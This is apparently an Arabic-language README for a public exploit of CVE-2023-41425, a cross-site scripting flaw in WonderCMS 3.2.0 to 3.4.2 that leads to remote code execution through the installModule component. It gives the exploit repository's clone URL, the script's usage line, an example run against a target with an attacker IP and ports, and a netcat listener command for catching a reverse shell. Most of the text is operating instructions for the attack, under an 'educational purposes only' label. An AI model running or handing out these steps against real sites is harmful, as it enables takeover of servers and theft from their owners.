
CVE-2023-41425 - ثغرة برمجة نصية عبر المواقع في Wonder CMS الإصدار 3.2.0 حتى 3.4.2 تسمح لمهاجم عن بعد بتنفيذ تعليمات برمجية عشوائية عبر نص برمجي معدل يتم تحميله إلى مكون installModule.
ثغرة برمجية من نوع Cross Site Scripting في Wonder CMS الإصدار 3.2.0 حتى 3.4.2 تسمح لمهاجم عن بعد بتنفيذ كود عشوائي عبر نص برمجي مصمم يتم رفعه إلى مكون installModule. لأغراض تعليمية فقط
يتطلب معرفة loginURL، صلاحيات المدير أو القدرة على جعل المدير ينقر على رابط XSS.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

لـ prodigiousMind لاكتشافه والإبلاغ عن الثغرة https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413